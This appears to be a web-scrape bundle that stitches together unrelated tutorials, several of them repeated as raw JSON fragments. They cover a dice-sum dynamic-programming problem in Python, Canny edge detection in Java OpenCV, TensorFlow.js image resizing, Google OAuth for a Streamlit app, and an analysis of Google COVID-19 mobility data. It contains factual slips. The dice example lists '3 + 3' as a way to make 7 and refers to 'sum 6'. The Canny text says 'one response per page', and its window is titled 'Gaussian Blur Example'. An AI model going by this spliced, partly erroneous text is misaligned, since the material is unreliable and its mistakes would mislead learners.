[ { "code": null, "e": 1496, "s": 1062, "text": "Suppose we have d dice, and each die has f number of faces numbered 1, 2, ..., f. We have to find the number of possible ways (out of fd total ways) modulo 10^9 + 7 to roll the dice so the sum of the face up numbers equal to the target. So if the input is like d = 2, f = 6, target = 7, then the output will be 6. So if we throw each dice with 6 faces, then there are 6 ways to get sum 6, as 1 + 6, 2 + 5, 3 + 3, 4 + 3, 5 + 2, 6 + 1." }, { "code": null, "e": 1540, "s": 1496, "text": "To solve this, we will follow these steps −" }, { "code": null, "e": 1553, "s": 1540, "text": "m := 1e9 + 7" }, { "code": null, "e": 1612, "s": 1553, "text": "make a table dp of order d x (t + 1), and fill this with 0" }, { "code": null, "e": 1842, "s": 1612, "text": "for i in range 0 to d – 1for j in range 0 to tif i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2047, "s": 1842, "text": "for j in range 0 to tif i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2112, "s": 2047, "text": "if i = 0, then dp[i, j] := 1 when j in range 1 to f, otherwise 0" }, { "code": null, "e": 2232, "s": 2112, "text": "otherwisefor l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2343, "s": 2232, "text": "for l in range 1 to fif j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2433, "s": 2343, "text": "if j – l > 0, then dp[i, j] := dp[i, j] + dp[i – 1, j - l], and dp[i,j] := dp[i, j] mod m" }, { "code": null, "e": 2459, "s": 2433, "text": "return dp[d – 1, t] mod m" }, { "code": null, "e": 2529, "s": 2459, "text": "Let us see the following implementation to get better understanding −" }, { "code": null, "e": 2540, "s": 2529, "text": " Live Demo" }, { "code": null, "e": 3057, "s": 2540, "text": "class Solution(object):\n def numRollsToTarget(self, d, f, t):\n mod = 1000000000+7\n dp =[[0 for i in range(t+1)] for j in range(d)]\n for i in range(d):\n for j in range(t+1):\n if i == 0:\n dp[i][j] = 1 if j>=1 and j<=f else 0\n else:\n for l in range(1,f+1):\n if j-l>0:\n dp[i][j]+=dp[i-1][j-l]\n dp[i][j]%=mod\n return dp [d-1][t] % mod\nob = Solution()\nprint(ob.numRollsToTarget(2,6,7))" }, { "code": null, "e": 3063, "s": 3057, "text": "2\n6\n7" }, { "code": null, "e": 3065, "s": 3063, "text": "6" } ]
Java example demonstrating canny edge detection in OpenCV.
The canny edge detector is known as optimal detector since it detects only the existing edges, gives only one response per page and minimizes the distance between the edge pixels and detected pixels. The Canny() method of the Imgproc class applies the canny edge detection algorithm on the given image. this method accepts − Two Mat objects representing the source and destination images. Two Mat objects representing the source and destination images. Two double variables to hold the threshold values. Two double variables to hold the threshold values. To detect the edges of a given image using the canny edge detector − Read the contents of the source image using the imread() method of the Imgcodecs class. Read the contents of the source image using the imread() method of the Imgcodecs class. Convert it into a gray scale image using the cvtColor() method of the Imgproc class. Convert it into a gray scale image using the cvtColor() method of the Imgproc class. Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3. Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3. Apply canny edge detection algorithm on the blurred image using the canny() method of the Imgproc. Apply canny edge detection algorithm on the blurred image using the canny() method of the Imgproc. Create an empty matrix with all values as 0. Create an empty matrix with all values as 0. Add the detected edges to it using the copyTo() method of the Mat class. Add the detected edges to it using the copyTo() method of the Mat class. import java.awt.Image; import java.awt.image.BufferedImage; import java.io.IOException; import javafx.application.Application; import javafx.embed.swing.SwingFXUtils; import javafx.scene.Group; import javafx.scene.Scene; import javafx.scene.image.ImageView; import javafx.scene.image.WritableImage; import javafx.stage.Stage; import org.opencv.core.Core; import org.opencv.core.Mat; import org.opencv.core.Scalar; import org.opencv.core.Size; import org.opencv.highgui.HighGui; import org.opencv.imgcodecs.Imgcodecs; import org.opencv.imgproc.Imgproc; public class EdgeDetection extends Application { public void start(Stage stage) throws IOException { //Loading the OpenCV core library System.loadLibrary( Core.NATIVE_LIBRARY_NAME ); String file ="D:\\Images\\win2.jpg"; Mat src = Imgcodecs.imread(file); //Creating an empty matrices to store edges, source, destination Mat gray = new Mat(src.rows(), src.cols(), src.type()); Mat edges = new Mat(src.rows(), src.cols(), src.type()); Mat dst = new Mat(src.rows(), src.cols(), src.type(), new Scalar(0)); //Converting the image to Gray Imgproc.cvtColor(src, gray, Imgproc.COLOR_RGB2GRAY); //Blurring the image Imgproc.blur(gray, edges, new Size(3, 3)); //Detecting the edges Imgproc.Canny(edges, edges, 100, 100*3); //Copying the detected edges to the destination matrix src.copyTo(dst, edges); //Converting matrix to JavaFX writable image Image img = HighGui.toBufferedImage(dst); WritableImage writableImage= SwingFXUtils.toFXImage((BufferedImage) img, null); //Setting the image view ImageView imageView = new ImageView(writableImage); imageView.setX(10); imageView.setY(10); imageView.setFitWidth(575); imageView.setPreserveRatio(true); //Setting the Scene object Group root = new Group(imageView); Scene scene = new Scene(root, 595, 400); stage.setTitle("Gaussian Blur Example"); stage.setScene(scene); stage.show(); } public static void main(String args[]) { launch(args); } } On executing, the above produces the following output −
[ { "code": null, "e": 1262, "s": 1062, "text": "The canny edge detector is known as optimal detector since it detects only the existing edges, gives only one response per page and minimizes the distance\nbetween the edge pixels and detected pixels." }, { "code": null, "e": 1387, "s": 1262, "text": "The Canny() method of the Imgproc class applies the canny edge detection algorithm on the given image. this method accepts −" }, { "code": null, "e": 1451, "s": 1387, "text": "Two Mat objects representing the source and destination images." }, { "code": null, "e": 1515, "s": 1451, "text": "Two Mat objects representing the source and destination images." }, { "code": null, "e": 1566, "s": 1515, "text": "Two double variables to hold the threshold values." }, { "code": null, "e": 1617, "s": 1566, "text": "Two double variables to hold the threshold values." }, { "code": null, "e": 1686, "s": 1617, "text": "To detect the edges of a given image using the canny edge detector −" }, { "code": null, "e": 1774, "s": 1686, "text": "Read the contents of the source image using the imread() method of the Imgcodecs class." }, { "code": null, "e": 1862, "s": 1774, "text": "Read the contents of the source image using the imread() method of the Imgcodecs class." }, { "code": null, "e": 1947, "s": 1862, "text": "Convert it into a gray scale image using the cvtColor() method of the Imgproc class." }, { "code": null, "e": 2032, "s": 1947, "text": "Convert it into a gray scale image using the cvtColor() method of the Imgproc class." }, { "code": null, "e": 2130, "s": 2032, "text": "Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3." }, { "code": null, "e": 2228, "s": 2130, "text": "Blur the resultant (gray) image using the blur() method of the Imgproc class with kernel value 3." }, { "code": null, "e": 2327, "s": 2228, "text": "Apply canny edge detection algorithm on the blurred image using the canny() method of the Imgproc." }, { "code": null, "e": 2426, "s": 2327, "text": "Apply canny edge detection algorithm on the blurred image using the canny() method of the Imgproc." }, { "code": null, "e": 2471, "s": 2426, "text": "Create an empty matrix with all values as 0." }, { "code": null, "e": 2516, "s": 2471, "text": "Create an empty matrix with all values as 0." }, { "code": null, "e": 2589, "s": 2516, "text": "Add the detected edges to it using the copyTo() method of the Mat class." }, { "code": null, "e": 2662, "s": 2589, "text": "Add the detected edges to it using the copyTo() method of the Mat class." }, { "code": null, "e": 4804, "s": 2662, "text": "import java.awt.Image;\nimport java.awt.image.BufferedImage;\nimport java.io.IOException;\nimport javafx.application.Application;\nimport javafx.embed.swing.SwingFXUtils;\nimport javafx.scene.Group;\nimport javafx.scene.Scene;\nimport javafx.scene.image.ImageView;\nimport javafx.scene.image.WritableImage;\nimport javafx.stage.Stage;\nimport org.opencv.core.Core;\nimport org.opencv.core.Mat;\nimport org.opencv.core.Scalar;\nimport org.opencv.core.Size;\nimport org.opencv.highgui.HighGui;\nimport org.opencv.imgcodecs.Imgcodecs;\nimport org.opencv.imgproc.Imgproc;\npublic class EdgeDetection extends Application {\n public void start(Stage stage) throws IOException {\n //Loading the OpenCV core library\n System.loadLibrary( Core.NATIVE_LIBRARY_NAME );\n String file =\"D:\\\\Images\\\\win2.jpg\";\n Mat src = Imgcodecs.imread(file);\n //Creating an empty matrices to store edges, source, destination\n Mat gray = new Mat(src.rows(), src.cols(), src.type());\n Mat edges = new Mat(src.rows(), src.cols(), src.type());\n Mat dst = new Mat(src.rows(), src.cols(), src.type(), new Scalar(0));\n //Converting the image to Gray\n Imgproc.cvtColor(src, gray, Imgproc.COLOR_RGB2GRAY);\n //Blurring the image\n Imgproc.blur(gray, edges, new Size(3, 3));\n //Detecting the edges\n Imgproc.Canny(edges, edges, 100, 100*3);\n //Copying the detected edges to the destination matrix\n src.copyTo(dst, edges); \n //Converting matrix to JavaFX writable image\n Image img = HighGui.toBufferedImage(dst);\n WritableImage writableImage= SwingFXUtils.toFXImage((BufferedImage) img, null);\n //Setting the image view\n ImageView imageView = new ImageView(writableImage);\n imageView.setX(10);\n imageView.setY(10);\n imageView.setFitWidth(575);\n imageView.setPreserveRatio(true);\n //Setting the Scene object\n Group root = new Group(imageView);\n Scene scene = new Scene(root, 595, 400);\n stage.setTitle(\"Gaussian Blur Example\");\n stage.setScene(scene);\n stage.show();\n }\n public static void main(String args[]) {\n launch(args);\n }\n}" }, { "code": null, "e": 4860, "s": 4804, "text": "On executing, the above produces the following output −" } ]
Tensorflow.js tf.image.resizeBilinear() Function - GeeksforGeeks
28 Jul, 2021 Tensorflow.js is an open-source library developed by Google for running machine learning models as well as deep learning neural networks in the browser or node environment. The .image.resizeBilinear() function is used to bilinearly rescale an individual 3D image or else a heap of 3D images to a different configuration. Syntax: tf.image.resizeBilinear(images, size, alignCorners?, halfPixelCenters?) Parameters: images: The stated images of rank 4 or else rank 3, which is of configuration [batch, height, width, inChannels]. Moreover, in case its of rank 3, then the batch of one is presumed. It can be of type tf.Tensor3D, tf.Tensor4D, TypedArray, or Array. size: The different stated configuration [newHeight, newWidth] in order to rescale the images. Every channel is rescaled one by one. It is of type [number, number]. alignCorners: It is the optional parameter whose by default value is false. In case its true, the the input is resized by (new_height – 1) / (height – 1), that absolutely queues the four corners of the stated images as well as rescaled images. However, if its false then it is rescaled by new_height / height. It deals in the same manner with the width dimension. It is of type Boolean. halfPixelCenters: It is the optional parameter whose by default value is false. It is of type Boolean. Return Value: It returns tf.Tensor3D, or tf.Tensor4D. Example 1: In this example, we are going to use a 4d tensor and a size parameter inside tf.image.resizeBilinear() function. Javascript // Importing the tensorflow.js libraryimport * as tf from "@tensorflow/tfjs" // Calling image.resizeBilinear() method and// Printing outputtf.image.resizeBilinear(tf.tensor4d([[ [[4, 7], [21, 9]], [[8, 9], [1, 33]] ]]), [3, 4]).print(); Output: Tensor [[[[4 , 7 ], [12.5 , 8 ], [21 , 9 ], [21 , 9 ]], [[6.666667 , 8.333333 ], [7.1666665, 16.666666], [7.666666 , 25 ], [7.666666 , 25 ]], [[8 , 9 ], [4.5 , 21 ], [1 , 33 ], [1 , 33 ]]]] Example 2: In this example, we are going to use an array of floats, alignCorners, as well as halfPixelCenters. Javascript // Importing the tensorflow.js libraryimport * as tf from "@tensorflow/tfjs" // Defining an array of floatsconst arr = [[ [[1.1, 1.7, 1.5, 1.1], [1.7, 1.9, 8.1, 6.3]], [[3.3, 3.4, 3.7, 4.0], [5.1, 5.2, 5.3, 5.9]] ]]; // Calling image.resizeBilinear() method and// Printing outputtf.image.resizeBilinear(arr, [1, 2], true, false).print(); Output: Tensor [[[[1.1, 1.7, 1.5 , 1.1 ], [1.7, 1.9, 8.1000004, 6.3000002]]]] Reference: https://js.tensorflow.org/api/latest/#image.resizeBilinear Picked Tensorflow.js JavaScript Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Difference between var, let and const keywords in JavaScript Difference Between PUT and PATCH Request Remove elements from a JavaScript Array How to get character array from string in JavaScript? How to get selected value in dropdown list using JavaScript ? Top 10 Front End Developer Skills That You Need in 2022 Installation of Node.js on Linux Top 10 Projects For Beginners To Practice HTML and CSS Skills How to fetch data from an API in ReactJS ? How to insert spaces/tabs in text using HTML/CSS?
[ { "code": null, "e": 24909, "s": 24881, "text": "\n28 Jul, 2021" }, { "code": null, "e": 25082, "s": 24909, "text": "Tensorflow.js is an open-source library developed by Google for running machine learning models as well as deep learning neural networks in the browser or node environment." }, { "code": null, "e": 25230, "s": 25082, "text": "The .image.resizeBilinear() function is used to bilinearly rescale an individual 3D image or else a heap of 3D images to a different configuration." }, { "code": null, "e": 25238, "s": 25230, "text": "Syntax:" }, { "code": null, "e": 25310, "s": 25238, "text": "tf.image.resizeBilinear(images, size, alignCorners?, halfPixelCenters?)" }, { "code": null, "e": 25324, "s": 25310, "text": "Parameters: " }, { "code": null, "e": 25572, "s": 25324, "text": "images: The stated images of rank 4 or else rank 3, which is of configuration [batch, height, width, inChannels]. Moreover, in case its of rank 3, then the batch of one is presumed. It can be of type tf.Tensor3D, tf.Tensor4D, TypedArray, or Array." }, { "code": null, "e": 25737, "s": 25572, "text": "size: The different stated configuration [newHeight, newWidth] in order to rescale the images. Every channel is rescaled one by one. It is of type [number, number]." }, { "code": null, "e": 26124, "s": 25737, "text": "alignCorners: It is the optional parameter whose by default value is false. In case its true, the the input is resized by (new_height – 1) / (height – 1), that absolutely queues the four corners of the stated images as well as rescaled images. However, if its false then it is rescaled by new_height / height. It deals in the same manner with the width dimension. It is of type Boolean." }, { "code": null, "e": 26227, "s": 26124, "text": "halfPixelCenters: It is the optional parameter whose by default value is false. It is of type Boolean." }, { "code": null, "e": 26281, "s": 26227, "text": "Return Value: It returns tf.Tensor3D, or tf.Tensor4D." }, { "code": null, "e": 26405, "s": 26281, "text": "Example 1: In this example, we are going to use a 4d tensor and a size parameter inside tf.image.resizeBilinear() function." }, { "code": null, "e": 26416, "s": 26405, "text": "Javascript" }, { "code": "// Importing the tensorflow.js libraryimport * as tf from \"@tensorflow/tfjs\" // Calling image.resizeBilinear() method and// Printing outputtf.image.resizeBilinear(tf.tensor4d([[ [[4, 7], [21, 9]], [[8, 9], [1, 33]] ]]), [3, 4]).print();", "e": 26661, "s": 26416, "text": null }, { "code": null, "e": 26669, "s": 26661, "text": "Output:" }, { "code": null, "e": 27054, "s": 26669, "text": "Tensor\n [[[[4 , 7 ],\n [12.5 , 8 ],\n [21 , 9 ],\n [21 , 9 ]],\n\n [[6.666667 , 8.333333 ],\n [7.1666665, 16.666666],\n [7.666666 , 25 ],\n [7.666666 , 25 ]],\n\n [[8 , 9 ],\n [4.5 , 21 ],\n [1 , 33 ],\n [1 , 33 ]]]]" }, { "code": null, "e": 27166, "s": 27054, "text": "Example 2: In this example, we are going to use an array of floats, alignCorners, as well as halfPixelCenters." }, { "code": null, "e": 27177, "s": 27166, "text": "Javascript" }, { "code": "// Importing the tensorflow.js libraryimport * as tf from \"@tensorflow/tfjs\" // Defining an array of floatsconst arr = [[ [[1.1, 1.7, 1.5, 1.1], [1.7, 1.9, 8.1, 6.3]], [[3.3, 3.4, 3.7, 4.0], [5.1, 5.2, 5.3, 5.9]] ]]; // Calling image.resizeBilinear() method and// Printing outputtf.image.resizeBilinear(arr, [1, 2], true, false).print();", "e": 27526, "s": 27177, "text": null }, { "code": null, "e": 27534, "s": 27526, "text": "Output:" }, { "code": null, "e": 27625, "s": 27534, "text": "Tensor\n [[[[1.1, 1.7, 1.5 , 1.1 ],\n [1.7, 1.9, 8.1000004, 6.3000002]]]]" }, { "code": null, "e": 27695, "s": 27625, "text": "Reference: https://js.tensorflow.org/api/latest/#image.resizeBilinear" }, { "code": null, "e": 27702, "s": 27695, "text": "Picked" }, { "code": null, "e": 27716, "s": 27702, "text": "Tensorflow.js" }, { "code": null, "e": 27727, "s": 27716, "text": "JavaScript" }, { "code": null, "e": 27744, "s": 27727, "text": "Web Technologies" }, { "code": null, "e": 27842, "s": 27744, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27851, "s": 27842, "text": "Comments" }, { "code": null, "e": 27864, "s": 27851, "text": "Old Comments" }, { "code": null, "e": 27925, "s": 27864, "text": "Difference between var, let and const keywords in JavaScript" }, { "code": null, "e": 27966, "s": 27925, "text": "Difference Between PUT and PATCH Request" }, { "code": null, "e": 28006, "s": 27966, "text": "Remove elements from a JavaScript Array" }, { "code": null, "e": 28060, "s": 28006, "text": "How to get character array from string in JavaScript?" }, { "code": null, "e": 28122, "s": 28060, "text": "How to get selected value in dropdown list using JavaScript ?" }, { "code": null, "e": 28178, "s": 28122, "text": "Top 10 Front End Developer Skills That You Need in 2022" }, { "code": null, "e": 28211, "s": 28178, "text": "Installation of Node.js on Linux" }, { "code": null, "e": 28273, "s": 28211, "text": "Top 10 Projects For Beginners To Practice HTML and CSS Skills" }, { "code": null, "e": 28316, "s": 28273, "text": "How to fetch data from an API in ReactJS ?" } ]
Implementing Google OAuth in Streamlit | by Duc Anh Bui | Towards Data Science
At HousingAnywhere, we often utilize Streamlit to build interactive dashboards for our metrics and targets. Streamlit is a relatively new tool. It has a lot of potential use cases and is very easy to use but can be lacking in some areas such as security. A popular, simple method for security most people use for Streamlit is to utilise SessionState, but it is very susceptible to attacks (e.g. brute forcing). In this article, I’ll show you how to implement Google OAuth 2.0 to better secure your application. First, let’s configure the OAuth consent screen. Go to the Google API Console OAuth consent screen page.Choose Internal so only users within your organization can access the app.Fill in the necessary information.Click Add Scopes and add any necessary scopes you require. For this example, we don’t need any. Go to the Google API Console OAuth consent screen page. Choose Internal so only users within your organization can access the app. Fill in the necessary information. Click Add Scopes and add any necessary scopes you require. For this example, we don’t need any. Next, we need to create an authorization credential from GCP: Go to the Credentials page in GCP ConsoleClick on Create Credentials > OAuth client ID.Select Web Application for Application type and fill in the name for your client.Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in local environment, you can use http://localhost:8501Note down the Client ID and Client Secret for later. Go to the Credentials page in GCP Console Click on Create Credentials > OAuth client ID. Select Web Application for Application type and fill in the name for your client. Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in local environment, you can use http://localhost:8501 Note down the Client ID and Client Secret for later. Install the following libraries streamlit==0.81.1httpx-oauth==0.3.5 We’ll utilize SessionState to store the token returned from Google API. Store this in a session_state.py : In the main application, we first define these three variables to store the Client ID and Secret from earlier: client_id = os.environ['GOOGLE_CLIENT_ID']client_secret = os.environ['GOOGLE_CLIENT_SECRET']redirect_uri = os.environ['REDIRECT_URI'] We’ll be using httpx-oauth as our authorization client: client = GoogleOAuth2(client_id, client_secret) Now, create a function that handles creating the authorization URL: async def write_authorization_url(client, redirect_uri): authorization_url = await client.get_authorization_url( redirect_uri, scope=["email"], extras_params={"access_type": "offline"}, ) return authorization_urlauthorization_url = asyncio.run( write_authorization_url(client=client, redirect_uri=redirect_uri))st.write(f'''<h1> Please login using this <a target="_self" href="{authorization_url}">url</a></h1>''', unsafe_allow_html=True) Once the user gets redirected back from Google Authorisation page, the authorization code is contained in the URL. We’ll obtain it using st.experimental_get_query_params() code = st.experimental_get_query_params()['code'] And get the token from Google with this function: async def write_access_token(client, redirect_uri, code): token = await client.get_access_token(code, redirect_uri) return tokentoken = asyncio.run( write_access_token(client=client, redirect_uri=redirect_uri, code=code))session_state.token = token The process can be visualized as follows: We store the token using the SessionState utility so that the user does not need to re-authorize during a session. Since we’re storing the token per session, refreshing the page will trigger the authorization process again. Securing your data is a crucial aspect of building data applications. With Google OAuth, you can sleep a little better at night knowing that your applications is better secured against a possible breach. You can check out the codes for the whole application here on GitHub.
[ { "code": null, "e": 583, "s": 172, "text": "At HousingAnywhere, we often utilize Streamlit to build interactive dashboards for our metrics and targets. Streamlit is a relatively new tool. It has a lot of potential use cases and is very easy to use but can be lacking in some areas such as security. A popular, simple method for security most people use for Streamlit is to utilise SessionState, but it is very susceptible to attacks (e.g. brute forcing)." }, { "code": null, "e": 683, "s": 583, "text": "In this article, I’ll show you how to implement Google OAuth 2.0 to better secure your application." }, { "code": null, "e": 732, "s": 683, "text": "First, let’s configure the OAuth consent screen." }, { "code": null, "e": 991, "s": 732, "text": "Go to the Google API Console OAuth consent screen page.Choose Internal so only users within your organization can access the app.Fill in the necessary information.Click Add Scopes and add any necessary scopes you require. For this example, we don’t need any." }, { "code": null, "e": 1047, "s": 991, "text": "Go to the Google API Console OAuth consent screen page." }, { "code": null, "e": 1122, "s": 1047, "text": "Choose Internal so only users within your organization can access the app." }, { "code": null, "e": 1157, "s": 1122, "text": "Fill in the necessary information." }, { "code": null, "e": 1253, "s": 1157, "text": "Click Add Scopes and add any necessary scopes you require. For this example, we don’t need any." }, { "code": null, "e": 1315, "s": 1253, "text": "Next, we need to create an authorization credential from GCP:" }, { "code": null, "e": 1730, "s": 1315, "text": "Go to the Credentials page in GCP ConsoleClick on Create Credentials > OAuth client ID.Select Web Application for Application type and fill in the name for your client.Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in local environment, you can use http://localhost:8501Note down the Client ID and Client Secret for later." }, { "code": null, "e": 1772, "s": 1730, "text": "Go to the Credentials page in GCP Console" }, { "code": null, "e": 1819, "s": 1772, "text": "Click on Create Credentials > OAuth client ID." }, { "code": null, "e": 1901, "s": 1819, "text": "Select Web Application for Application type and fill in the name for your client." }, { "code": null, "e": 2096, "s": 1901, "text": "Fill in redirect URIs for your application. These are the links you want the users to be redirected back to after logging in. For example, in local environment, you can use http://localhost:8501" }, { "code": null, "e": 2149, "s": 2096, "text": "Note down the Client ID and Client Secret for later." }, { "code": null, "e": 2181, "s": 2149, "text": "Install the following libraries" }, { "code": null, "e": 2217, "s": 2181, "text": "streamlit==0.81.1httpx-oauth==0.3.5" }, { "code": null, "e": 2324, "s": 2217, "text": "We’ll utilize SessionState to store the token returned from Google API. Store this in a session_state.py :" }, { "code": null, "e": 2435, "s": 2324, "text": "In the main application, we first define these three variables to store the Client ID and Secret from earlier:" }, { "code": null, "e": 2569, "s": 2435, "text": "client_id = os.environ['GOOGLE_CLIENT_ID']client_secret = os.environ['GOOGLE_CLIENT_SECRET']redirect_uri = os.environ['REDIRECT_URI']" }, { "code": null, "e": 2625, "s": 2569, "text": "We’ll be using httpx-oauth as our authorization client:" }, { "code": null, "e": 2673, "s": 2625, "text": "client = GoogleOAuth2(client_id, client_secret)" }, { "code": null, "e": 2741, "s": 2673, "text": "Now, create a function that handles creating the authorization URL:" }, { "code": null, "e": 3287, "s": 2741, "text": "async def write_authorization_url(client, redirect_uri): authorization_url = await client.get_authorization_url( redirect_uri, scope=[\"email\"], extras_params={\"access_type\": \"offline\"}, ) return authorization_urlauthorization_url = asyncio.run( write_authorization_url(client=client, redirect_uri=redirect_uri))st.write(f'''<h1> Please login using this <a target=\"_self\" href=\"{authorization_url}\">url</a></h1>''', unsafe_allow_html=True)" }, { "code": null, "e": 3459, "s": 3287, "text": "Once the user gets redirected back from Google Authorisation page, the authorization code is contained in the URL. We’ll obtain it using st.experimental_get_query_params()" }, { "code": null, "e": 3509, "s": 3459, "text": "code = st.experimental_get_query_params()['code']" }, { "code": null, "e": 3559, "s": 3509, "text": "And get the token from Google with this function:" }, { "code": null, "e": 3917, "s": 3559, "text": "async def write_access_token(client, redirect_uri, code): token = await client.get_access_token(code, redirect_uri) return tokentoken = asyncio.run( write_access_token(client=client, redirect_uri=redirect_uri, code=code))session_state.token = token" }, { "code": null, "e": 3959, "s": 3917, "text": "The process can be visualized as follows:" }, { "code": null, "e": 4183, "s": 3959, "text": "We store the token using the SessionState utility so that the user does not need to re-authorize during a session. Since we’re storing the token per session, refreshing the page will trigger the authorization process again." } ]
Can Google’s Mobility Report explain New Zealand’s win against the virus? | by Alejandra Vlerick | Towards Data Science
Europe has slowly started opening up after months of restless lockdown, this gives me hope that the worst is behind us. Working from home and virtual wine evenings with friends have become the new ‘normal’. These measures have been put into motion to enforce physical distancing and ultimately slow down the spread of the deadly virus. How effective have these policies been in reducing human movement? What impact has it had on the way people live, work and move? Google introduced the COVID-19 Community Mobility Reports using anonymous data gathered from apps such as Google Maps. This dataset is regularly updated by Google itself and can be found here. The latest date available for the purpose of this analysis is May 24th. Specific categories of destinations have been identified in this Google study and they have measured the number of visitors to those destinations. The number of visits per day are then compared to a baseline day (selected to be an average day before the pandemic). Grocery stores Pharmacies Time spent at home A baseline day is a ‘normal day’ (not a holiday, sports event, Valentine’s, St. Patrick’s, etc). The baseline day provides a reliable objective value for a specific day of the week. Meaning that we have a baseline value of people going to the groceries store on Monday, Tuesday, Wednesday, Friday, Saturday and Sunday. Creating baseline days is a clever way of differentiating weekend from weekdays for example. I usually do my grocery shopping on weekends, not Tuesdays. I suspect I’m not alone in this. In Spain, France or Belgium, supermarkets are not open on Sundays, the baseline value will be lower than for countries where everything is always open. The data is presented in percentage change, this can be positive (when mobility to a destination increased) or negative (when it decreased). A choropleth map is a thematic map in which areas are shaded in proportion to a statistical variable that represents an aggregate summary of a geographic characteristic within each area. Additionally, I chose to use a line-graph to plot the mobility change in four countries that have been particularly affected by the virus: United States, Brazil and the United Kingdom. I also added New Zealand because they recently eradicated their last case of coronavirus. Impressive! Retail and recreation: How did the number of visitors to retailers and recreation centres change since the beginning of the pandemic? The graph below paints an image of the percentage change in mobility when compared with the baseline value. A few observations can be made: March 15th was the first day where more coronavirus cases were recorded outside of mainland China than inside. This triggered the change in mobility pattern for all the countries presented in this study. The country with the most noticeable change in mobility compared to baseline values was New Zealand. They reduced their store visits by 90%! More than any other country. It is important to notice that the United States as an increasing trend in the number of store visits that started from April 12 onwards. After a drastic change in behaviour that reached a peak on March 29th, American’s have allowed themselves to visit more and more retail stores. In comparison, the United Kingdom saw a constant decrease in store visits that hit a minimum on March 29th, but this number of store visits has managed to stay constant throughout the isolation period. The number of visits made to pharmacies compared to the baseline varies greatly by country, as can be seen from the graph below. For the United States, the change in number of visits transitioned from positive to negative on the 22nd of March. On this day, the number of coronavirus cases was 26,747, overtaking countries like Spain, Iran and Germany. This made them the third-highest affected country in the world. New Zealand is again at the top of the chart with the highest percentage change, meaning they made the least pharmacy visits. Note: Unlike the previous two charts, the percentages here are positive and they indicate in increase in time spent at home (previously we were talking about a decrease in visits to stores or pharmacy) . A couple of observations can be made: The United States was the first to enforce stay at home policies, but this translated into only 15 -20% more time spent at home than on baseline days. During April and May, this percentage decreased to 5 -15%. This is in line with the previous observations as the number of store visits and pharmacy visits increased during this period. It is surprising to note that the United States behaviour is very similar to that in Brazil. New-Zealand was the last to impose stay at home policies, yet they had the biggest percentage change reaching on average 35% more time spent at home. This value stayed constant until early May when the government allowed more freedom of movement. Many more insights can be drawn from the information provided by Google’s Mobility report. This article is just an initial appraisal. More updates will come soon, please comment below of you would like to see your country of origin or residence in the updates to come. # Import librariesimport numpy as npimport pandas as pdimport plotly as pyimport plotly.express as pximport plotly.graph_objs as gofrom plotly.subplots import make_subplotsfrom tabulate import tabulate# Read Datadf = pd.read_csv("data/Global_Mobility_Report.csv", low_memory=False)# Rename columnsdf = df.rename(columns={'country_region':'Country'})df = df.rename(columns={'date':'Date'})df = df.rename(columns={'retail_and_recreation_percent_change_from_baseline':'retail'})df = df.rename(columns={'grocery_and_pharmacy_percent_change_from_baseline':'pharmacy'})df = df.rename(columns={'parks_percent_change_from_baseline':'parks'})df = df.rename(columns={'transit_stations_percent_change_from_baseline':'transit_station'})df = df.rename(columns={'workplaces_percent_change_from_baseline':'workplaces'})df = df.rename(columns={'residential_percent_change_from_baseline':'residential'})df.drop(['country_region_code','sub_region_1', 'sub_region_2'], axis=1, inplace = True)print(tabulate(df[20000:20050], headers='keys', tablefmt='psql'))# Manipulate Dataframedf_countries = df.groupby(['Country', 'Date']).sum().reset_index().sort_values('Date', ascending=False)df_countries = df_countries.drop_duplicates(subset = ['Country'])# Manipulating the original dataframedf_countrydate = dfdf_countrydate = df_countrydate.groupby(['Date','Country']).sum().reset_index()min_cases = df_countrydate['residential'].min()df_country = df.groupby(['Country','Date']).sum().reset_index()c2 = df_country[df_country['Country']=="New Zealand"]c3 = df_country[df_country['Country']=="Brazil"]c4 = df_country[df_country['Country']=="United Kingdom"]c5 = df_country[df_country['Country']=="United States"]frames = [c2, c3, c4, c5]countries = pd.concat(frames)fig = px.line(countries, x="Date", y="pharmacy", title='pharmacy', color = 'Country')# fig.show()fig = px.choropleth(df_countrydate, locations="Country", locationmode="country names", color="retail", hover_name="Country", animation_frame="Date", # range_color=(0, 20000), range_color=(-500, 500), color_continuous_scale=px.colors.diverging.Picnic, color_continuous_midpoint=min_cases, )fig.update_layout( title_text='Stay at home (quarantine) during coronavirus pandemic', title_x=0.5, geo=dict( showframe=False, showcoastlines=False, ))# fig.show() All the code can be found in the world_covid.py file on Github here! If you like my work, I’d greatly appreciate if you followed me Medium here. If you have any questions, suggestions or ideas on how to improve, please leave a comment below or get in touch through LinkedIn here.
